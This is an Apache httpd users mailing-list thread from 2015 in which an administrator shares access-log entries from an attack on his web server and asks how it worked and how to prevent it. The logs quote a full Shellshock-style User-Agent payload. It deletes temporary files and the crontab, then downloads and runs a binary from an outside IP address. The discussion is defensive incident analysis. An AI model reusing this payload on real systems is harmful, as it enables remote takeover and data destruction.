"sc.gif" was executed.
On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered
the /index.html page.
Or did you find that "sc.gif" was transferred and executed?
Kurt Bremser
AMOS Austria
Newton was wrong. There is no gravity. The Earth sucks.
------------------------------------------------------------------------
*Von:* Victor Sterpu [vic...@casnt.ro]
*Gesendet:* Donnerstag, 2. Juli 2015 14:29
*An:* users@httpd.apache.org
*Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc]
In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ;
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl
-O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there
something I can do to allow only local scripts to be executed?
On 02.07.2015 15:13, Yehuda Katz wrote:
It is an attempt to exploit a specific configuration. By the fact
that apache returned a 404 (the log line says so), you can see that
attempt was not successful.
- Y
Sent from a gizmo with a very small keyboard and hyperactive
autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vic...@casnt.ro
<mailto:vic...@casnt.ro>> wrote:
Hello
A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
/phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
:;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
/var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
chmod +x sc.gif ; nohup ./sc.gif & \");'"
How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this
command and I want to know so I can test my vulnerabilities in
the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.
Thank you
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
<mailto:users-unsubscr...@httpd.apache.org>
For additional commands, e-mail: users-h...@httpd.apache.org
<mailto:users-h...@httpd.apache.org>
AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737
http://www.allianz.at
********************************************************
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
enthalten Informationen, die vertraulich und
ausschliesslich fuer den (die) bezeichneten Adressaten
bestimmt sind.
Wenn Sie nicht der genannte Adressat sind, darf dieses
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
Personen zugaenglich gemacht noch in anderer Weise
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen.
Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.
********************************************************
